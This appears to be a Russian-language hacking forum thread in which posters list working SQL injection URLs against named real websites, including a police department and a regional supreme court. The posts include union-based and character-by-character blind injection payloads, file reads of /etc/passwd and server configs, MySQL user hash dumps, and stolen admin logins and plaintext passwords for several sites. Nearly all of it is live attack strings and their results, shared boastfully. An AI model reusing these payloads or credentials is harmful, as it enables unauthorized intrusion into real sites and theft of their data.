Code: http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ ws(0 x3a,version(),database(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15-- Database Version : 4.0.24_Debian Database name : amazighworld_org User name : amazighworld_org@localhost
kusa.ca PR5 Code: http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/* DBVer:4.1.20 User: root@localhost << Вот это я вообще не ожидал увидить, но это ладно! =) самое интересное еще впереди!! DBName:desar01_cms Работает чтение файлов... /etc/passwd Code: http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/* /etc/httpd/conf/httpd.conf(от сюда видно, что кроме уязвимого есть на этом сервере еще несколько сайтов) Code: http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/* Теперь посмотрим что за пользователи... Code: http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/* И тут оказывается что на root вообще нет пароля =))) Этому я нашел подтверждение, прочитав конфиг от местного форума: Code: http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/* =)
Code: http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),use r()),5,6, 7,8,9,10,11-- Database Version : 5.0.32 - Debian Database name : emapfm User name : emapfm@localhost Code: http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws( 0x3a,version(),database (),user()),13,14-- Database Version : 5.0.67 Database name : cms_admin User name : root@localhost берём админа: Code: http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0 x3a,user,password ),13,14+from+my sql.user+limit+0,1-- root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - пасс не расшифровал
Code: http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/* version: 4.0.24_Debian-10sarge2-log user:adminstr@localhost database:adminstr
tatsud.ru ВЕРХОВНЫЙ СУД РЕСПУБЛИКИ ТАТАРСТАН=))) юзер - tatsud@localhost БД - BDSUD версия MySQL - 5.0.66a P.s. дальше копаться совесть не позволила=))
abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) звоним 911 =) MySQL Ver: 4.1.22 Code: http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(version(),1,1)))=52 -> 4(ветка) Я провел до конца брут и выяснил какой же точно версии... User : apd@localhost Code: http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97 -> a http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112 -> p http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100 -> d http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),4,1)))=64 -> @ http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),5,1)))=108 -> l http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),6,1)))=111 -> o http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),7,1)))=99 -> c http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),8,1)))=97 -> a http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),9,1)))=108 -> l http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),10,1)))=104 -> h http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),11,1)))=111 -> o http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),12,1)))=115 -> s http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),13,1)))=116 -> t DB : hh_apd Code: http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),1,1)))=104 -> h http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),2,1)))=104 -> h http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),3,1)))=95 -> _ http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),4,1)))=97 -> a http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),5,1)))=112 -> p http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),6,1)))=100 -> d Еще один клиент... на том же хостинге.. =\ tourismabbotsford.ca - PR5 Уязвимость в: Code: http://www.tourismabbotsford.ca/index.php?page_id=291 MySQL Ver: 4.1.22 User : tourism@localhost DB : hh_tourism
http://www.tv.myzone.ro/index.php?mid=13[SQL] Version :5.0.45-log Database: avatarul_tvmyzone User: [email protected] blind sql...bruted
http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),1,1))=102 f http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),2,1))=116 t http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),3,1))=101 e http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),4,1))=64 @ http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),5,1))=49 1 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),6,1))=57 9 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),7,1))=50 2 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),8,1))=46 . http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),9,1))=49 1 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),10,1))=54 6 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),11,1))=56 8 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),12,1))=46 . http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),13,1))=49 1 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),14,1))=46 . http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),15,1))=51 3 [email protected] *********************** http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1,1))=53 5 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2,1))=46 . http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),3,1))=48 2 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),4,1))=46 1 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),5,1))=50 2 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),6,1))=50 2 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),7,1))=45 - http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),8,1))=68 D http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),9,1))=101 e http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),10,1))=98 b http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),11,1))=105 i http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),12,1))=97 a http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),13,1))=110 n http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),14,1))=95 _ http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),15,1))=48 0 http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),16,1))=117 u http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),17,1))=98 b http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),18,1))=117 u http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),19,1))=110 n http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),20,1))=116 t http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),21,1))=117 u http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),22,1))=54 6 5.2122 PS надоело)
http://www.bmxmagazin.ro/index.php?ref=2&categ1=-33+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7-- Database Version: 5.0.75-log Database name: bmxmagazin_website User name: bmxmagazin@localhost всё сложнее найти скули в домене ро, но от этого факта мне еще интересне
вот тебе Contemporary Romanian Writers Code: http://www.romanianwriters.ro/book.php?id=-9+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())-- user(): romanian_svc@localhost database(): romanian_svc 2 version(): 5.0.67-community
http://www.starmall.ro/magazin/?c=8&s=-34+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7 Version : 5.0.67-community Database : starmall_db User :starmall_star@localhost я не говорил невозможно.....
Какой то самопальный двиг(PageRank: 4 тИЦ: 200): HTML: http://absolutist.ru/admin/generation/gen.game_float.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3A,user(),@@version,database()),22,23,24,25,26,27,28,29,30&pid=-1
http://www.copycomputer.ro/index.php?ref=12&id=237+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15-- Database Version: 5.0.67-community Database name: copycomp_MySql User name: copycomp@localhost На сегодня все,спокойной ночи всем.
Книжный магазин Code: http://book.xadi.net/index.php?book=-19475%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11%20-- version::4.1.22-max user::xadinet_xadi@localhost database::xadinet_db
Code: http://www.godwinart.com/two.php?id=-1194+union+select+1,version(),3,4,5,6,7,8-- 5.0.67-community немного искусства..
Федеральное Радио http://www.federalnewsradio.com/index.php/www.defenselink.mil/mtom/index.php?nid=84&sid=-1433980+union+select+1,version()/* version::5.0.32-Debian_7etch5-log user::[email protected] database::tags
Code: http://www.ps2modchip.com.br/two.php?flag=noticias&id=-6+union+select+1,version(),3,4,5/* 4.0.27-locaweb-log Code: http://www.parceiraagronegocios.com.br/two.php?flag=informativo&id=-2+union+select+1,version(),3-- 5.0.67-community
www.pulse-of-reason.ru Сайт какой-то Казанской рок-группы) находим таблицу с админами: http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),1,1))='112 = p http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),2,1))='117 = u http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),3,1))='108 = l http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),4,1))='115 = s http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),5,1))='101 = e http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),6,1))='111 = o http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),7,1))='102 = f http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),8,1))='114 = r http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),9,1))='101 = e http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),10,1))='97 = a http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),11,1))='115 = s http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),12,1))='111 = o http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),13,1))='110 = n http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),14,1))='95 = _ http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),15,1))='97 = a http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),16,1))='100 = d http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),17,1))='109 = m http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),18,1))='105 = i http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),19,1))='110 = n http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),20,1))='0 з.ы. имена колонок с паролями и логинами посмотрел в сурсе страницы авторизации админа, очень часто они подходят) логин админа: http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),1,1))='97 = a http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),2,1))='100 = d http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),3,1))='109 = m http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),4,1))='105 = i http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),5,1))='110 = n http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),6,1))='0 пасс админа: http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),1,1))='97 = a http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),2,1))='100 = d http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),3,1))='109 = m http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),4,1))='105 = i http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),5,1))='110 = n http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),6,1))='0 логин - пасс второго админа: xernya - xernya
Магазин оргтехники 5-я ветка Code: http://www.05.ru/catalog.php?cid=47 union select 1,concat_ws(0x3a,admin_name,admin_pass),3,4,5,6 FROM admin_users limit 1,1 -- loginass azim:4z1m Ещё один магаз орг техники Code: http://www.ecopies.ru/showitem.php?itemid=99999+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+FROM users+-- админка Code: http://ecopies.ru/admin/ login :: pass admin :: ke21pud можно поглумится ))